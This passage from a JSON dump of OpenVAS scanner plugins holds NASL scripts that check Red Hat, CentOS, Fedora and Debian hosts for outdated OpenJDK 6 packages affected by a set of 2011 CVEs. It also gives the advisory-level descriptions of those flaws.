rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:05", "references": ["2011-15020", "http://lists.fedoraproject.org/pipermail/package-announce/2011-November/068806.html"], "pluginID": "1361412562310863904", "description": "Check for the Version of java-1.6.0-openjdk", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-04-02T00:00:00", "title": "Fedora Update for java-1.6.0-openjdk FEDORA-2011-15020", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310863904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.6.0-openjdk FEDORA-2011-15020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"java-1.6.0-openjdk on Fedora 16\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/068806.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863904\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:31:10 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\",\n \"CVE-2011-3553\", \"CVE-2011-3544\", \"CVE-2011-3521\", \"CVE-2011-3554\",\n \"CVE-2011-3389\", \"CVE-2011-3558\", \"CVE-2011-3556\", \"CVE-2011-3557\",\n \"CVE-2011-3560\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-15020\");\n script_name(\"Fedora Update for java-1.6.0-openjdk FEDORA-2011-15020\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~60.1.10.4.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T10:57:40", "references": ["2011-15020", "http://lists.fedoraproject.org/pipermail/package-announce/2011-November/068806.html"], "pluginID": "863904", "description": "Check for the Version of java-1.6.0-openjdk", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-04-02T00:00:00", "title": "Fedora Update for java-1.6.0-openjdk FEDORA-2011-15020", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-01-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863904", "id": "OPENVAS:863904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.6.0-openjdk FEDORA-2011-15020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"java-1.6.0-openjdk on Fedora 16\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/068806.html\");\n script_id(863904);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:31:10 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\",\n \"CVE-2011-3553\", \"CVE-2011-3544\", \"CVE-2011-3521\", \"CVE-2011-3554\",\n \"CVE-2011-3389\", \"CVE-2011-3558\", \"CVE-2011-3556\", \"CVE-2011-3557\",\n \"CVE-2011-3560\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-15020\");\n script_name(\"Fedora Update for java-1.6.0-openjdk FEDORA-2011-15020\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~60.1.10.4.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:56", "references": ["2011:1380", "http://lists.centos.org/pipermail/centos-announce/2011-October/018121.html"], "pluginID": "881023", "description": "Check for the Version of java", "edition": 2, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-10-21T00:00:00", "title": "CentOS Update for java CESA-2011:1380 centos5 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881023", "id": "OPENVAS:881023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2011:1380 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n A flaw was found in the Java RMI (Remote Method Invocation) registry\n implementation. A remote RMI client could use this flaw to execute\n arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n \n A flaw was found in the Java RMI registry implementation. A remote RMI\n client could use this flaw to execute code on the RMI server with\n unrestricted privileges. (CVE-2011-3557)\n \n A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\n code. An untrusted Java application or applet running in a sandbox could\n use this flaw to bypass sandbox restrictions by deserializing\n specially-crafted input. (CVE-2011-3521)\n \n It was found that the Java ScriptingEngine did not properly restrict the\n privileges of sandboxed applications. An untrusted Java application or\n applet running in a sandbox could use this flaw to bypass sandbox\n restrictions. (CVE-2011-3544)\n \n A flaw was found in the AWTKeyStroke implementation. An untrusted Java\n application or applet running in a sandbox could use this flaw to bypass\n sandbox restrictions. (CVE-2011-3548)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the Java2D code used to perform transformations of graphic shapes\n and images. An untrusted Java application or applet running in a sandbox\n could use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n \n An insufficient error checking flaw was found in the unpacker for JAR files\n in pack200 format. A specially-crafted JAR file could use this flaw to\n crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\n with JVM privileges. (CVE-2011-3554)\n \n It was found that HttpsURLConnection did not perform SecurityManager checks\n in the setSSLSocketFactory method. An untrusted Java application or applet\n running in a sandbox could use this flaw to bypass connection restrictions\n defined in the policy. (CVE-2011-3560)\n \n A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\n ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\n chosen plain text attack against a connection mixing trusted and untrusted\n data could use this flaw to recover portions of the trusted data sent over\n the connection. (CVE-2011-3389)\n \n Note: This update mitigates the CVE-2011-3389 issue by splitting the first\n application data record byte to a separate SSL/TLS protocol record. This\n mitigation may cause compatibility issues with some SSL/TLS implementations\n and can be ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"java on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-October/018121.html\");\n script_id(881023);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1380\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\",\n \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\",\n \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\",\n \"CVE-2011-3560\");\n script_name(\"CentOS Update for java CESA-2011:1380 centos5 i386\");\n\n script_summary(\"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-16T13:04:34", "references": ["https://www.redhat.com/archives/rhsa-announce/2011-October/msg00011.html", "2011:1380-01"], "pluginID": "1361412562310870501", "description": "Check for the Version of java-1.6.0-openjdk", "edition": 5, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-10-21T00:00:00", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2011:1380-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310870501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870501", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2011:1380-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n A flaw was found in the Java RMI (Remote Method Invocation) registry\n implementation. A remote RMI client could use this flaw to execute\n arbitrary code on the RMI server running the registry. (CVE-2011-3556)\n \n A flaw was found in the Java RMI registry implementation. A remote RMI\n client could use this flaw to execute code on the RMI server with\n unrestricted privileges. (CVE-2011-3557)\n \n A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization\n code. An untrusted Java application or applet running in a sandbox could\n use this flaw to bypass sandbox restrictions by deserializing\n specially-crafted input. (CVE-2011-3521)\n \n It was found that the Java ScriptingEngine did not properly restrict the\n privileges of sandboxed applications. An untrusted Java application or\n applet running in a sandbox could use this flaw to bypass sandbox\n restrictions. (CVE-2011-3544)\n \n A flaw was found in the AWTKeyStroke implementation. An untrusted Java\n application or applet running in a sandbox could use this flaw to bypass\n sandbox restrictions. (CVE-2011-3548)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the Java2D code used to perform transformations of graphic shapes\n and images. An untrusted Java application or applet running in a sandbox\n could use this flaw to bypass sandbox restrictions. (CVE-2011-3551)\n \n An insufficient error checking flaw was found in the unpacker for JAR files\n in pack200 format. A specially-crafted JAR file could use this flaw to\n crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code\n with JVM privileges. (CVE-2011-3554)\n \n It was found that HttpsURLConnection did not perform SecurityManager checks\n in the setSSLSocketFactory method. An untrusted Java application or applet\n running in a sandbox could use this flaw to bypass connection restrictions\n defined in the policy. (CVE-2011-3560)\n \n A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block\n ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a\n chosen plain text attack against a connection mixing trusted and untrusted\n data could use this flaw to recover portions of the trusted data sent over\n the connection. (CVE-2011-3389)\n \n Note: This update mitigates the CVE-2011-3389 issue by splitting the first\n application data record byte to a separate SSL/TLS protocol record. This\n mitigation may cause compatibility issues wi ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00011.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870501\");\n script_version(\"$Revision: 12370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 08:56:29 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1380-01\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\",\n \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\",\n \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3558\",\n \"CVE-2011-3560\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2011:1380-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.23.1.9.10.el5_7\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:51:15", "references": [], "pluginID": "70570", "description": "The remote host is missing an update to openjdk-6\nannounced via advisory DSA 2356-1.", "edition": 2, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-02-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Debian Security Advisory DSA 2356-1 (openjdk-6)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=70570", "id": "OPENVAS:70570", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2356_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2356-1 (openjdk-6)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in OpenJDK, an\nimplementation of the Java platform:\n\nCVE-2011-3389\nThe TLS implementation does not guard properly against certain\nchosen-plaintext attacks when block ciphers are used in CBC\nmode.\n\nCVE-2011-3521\nThe CORBA implementation contains a deserialization\nvulnerability in the IIOP implementation, allowing untrusted\nJava code (such as applets) to elevate its privileges.\n\nCVE-2011-3544\nThe Java scripting engine lacks necessary security manager\nchecks, allowing untrusted Java code (such as applets) to\nelevate its privileges.\n\nCVE-2011-3547\nThe skip() method in java.io.InputStream uses a shared buffer,\nallowing untrusted Java code (such as applets) to access data\nthat is skipped by other code.\n\nCVE-2011-3548\nThe java.awt.AWTKeyStroke class contains a flaw which allows\nuntrusted Java code (such as applets) to elevate its\nprivileges.\n\nCVE-2011-3551\nThe Java2D C code contains an integer overflow which results\nin a heap-based buffer overflow, potentially allowing\nuntrusted Java code (such as applets) to elevate its\nprivileges.\n\nCVE-2011-3552\nMalicous Java code can use up an excessive amount of UDP\nports, leading to a denial of service.\n\nCVE-2011-3553\nJAX-WS enables stack traces for certain server responses by\ndefault, potentially leaking sensitive information.\n\nCVE-2011-3554\nJAR files in pack200 format are not properly checked for\nerrors, potentially leading to arbitrary code execution when\nunpacking crafted pack200 files.\n\nCVE-2011-3556\nThe RMI Registry server lacks access restrictions on certain\nmethods, allowing a remote client to execute arbitrary code.\n\nCVE-2011-3557\nThe RMI Registry server fails to properly restrict privileges\nof untrusted Java code, allowing RMI clients to elevate their\nprivileges on the RMI Registry server.\n\nCVE-2011-3560\nThe com.sun.net.ssl.HttpsURLConnection class does not perform\nproper security manager checks in the setSSLSocketFactory()\nmethod, allowing untrusted Java code to bypass security policy\nrestrictions.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 6b18-1.8.10-0+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem has been fixed in version 6b23~pre11-1.\n\nWe recommend that you upgrade your openjdk-6 packages.\";\ntag_summary = \"The remote host is missing an update to openjdk-6\nannounced via advisory DSA 2356-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202356-1\";\n\nif(description)\n{\n script_id(70570);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-3521\", \"CVE-2011-3544\", \"CVE-2011-3547\", \"CVE-2011-3548\", \"CVE-2011-3551\", \"CVE-2011-3552\", \"CVE-2011-3553\", \"CVE-2011-3554\", \"CVE-2011-3556\", \"CVE-2011-3557\", \"CVE-2011-3560\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n 